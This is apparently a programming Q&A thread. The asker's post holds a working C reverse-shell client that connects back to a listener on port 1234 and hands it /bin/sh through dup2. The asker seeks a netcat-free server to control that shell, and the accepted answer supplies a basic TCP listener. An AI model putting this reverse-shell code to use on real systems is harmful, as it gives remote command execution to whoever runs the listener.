# Redirecting shell from client to server via sockets using dup2 without netcat

Tags: c, sockets, pipe, dup2

Does anybody have any ideas on: How I could implement a server for this client without using **netcat**?

I've tried different things but as I'm not too familiar with pipes I thought about making this post. If I use this code and i set up a netcat listener such as "nc -l 1234"  I would receive the redirected shell from the client below.

How could I implement a server with 
the same functionality as netcat, but without using netcat for this particular client?

Thanks.

```
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(void) {
    int sock = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in serv_addr = {0};
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons(1234);
    serv_addr.sin_addr.s_addr = inet_addr("127.0.0.1");
    connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr));
    dup2(sock, 0);
    dup2(sock, 1);
    dup2(sock, 2);
    //system("uname -a; w; id");
    execl("/bin/sh", "sh", NULL);
}
```

Comment: Are you sure you want to execute the shell on the client, not on the server?

Comment: the shell should be executed in the client side and be controled in the server side :)

Answer (score 0, accepted):

The following code creates a basic listener that accepts a single connection:

```
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(void) {
    // 1. Create a socket with the socket() system call
    int sock = socket(AF_INET, SOCK_STREAM, 0);

    // 2. Bind the socket to an address using the bind() system call.
    struct sockaddr_in serv_addr = {0};
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_addr.s_addr = INADDR_ANY;
    serv_addr.sin_port = htons(1234);
    bind(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr));

    // 3. Listen for connections with the listen() system call
    listen(sock, 128);

    // 4. Accept a connection with the accept() system call.
    struct sockaddr_in cli_addr = {0};
    socklen_t cli_addrlen = sizeof(cli_addr);
    int acc_sock = accept(sock, (struct sockaddr *)&cli_addr, &cli_addrlen);

    // 5. Send and receive data
    char buf[1024];
    ssize_t nread;

    // Read from stdin, write to socket
    nread = read(0, buf, 1024);
    write(acc_sock, buf, nread);

    // Read from socket, write to stdout
    nread = read(acc_sock, buf, 1024);
    write(1, buf, nread);
}
```

Of course, you will want to make this more robust by checking for errors.  You probably would want to wrap steps 4 and 5 in a loop to allow more than one connection.

Step 5 is just an example of how to communicate over the socket once a connection is established.  If you want to continuously pass data between the terminal and the socket (like netcat), you will probably want to use a [`select`](http://linux.die.net/man/2/select) loop.

References:

- [`socket`](http://linux.die.net/man/2/socket), [`bind`](http://linux.die.net/man/2/bind), [`listen`](http://linux.die.net/man/2/listen), [`accept`](http://linux.die.net/man/2/accept)
- [Sockets Tutorial](http://www.linuxhowtos.org/C_C++/socket.htm)
- [Unix Socket - Server Examples](http://www.tutorialspoint.com/unix_sockets/socket_server_example.htm)

Comment: thanks for the reply @augurar, the part of setting a server is clear, my question resides more in the part about interacting with the shell itself rather than setting up a server skeleton code.

Comment: im not sure what steps i have to follow in order to interact with the shell fd.

Comment: @ÑachHuidobro You can read from and write to `acc_sock` like any file descriptor.  What do you want to do specifically?

Comment: is there any chance you can write a PoC of a server that handles the client above?. All i want is to create a server that handles the shell given by the client

Comment: @ÑachHuidobro Added an example -- communicating with the socket is done exactly the same as with any other input stream.

Comment: Thanks alot augurar :)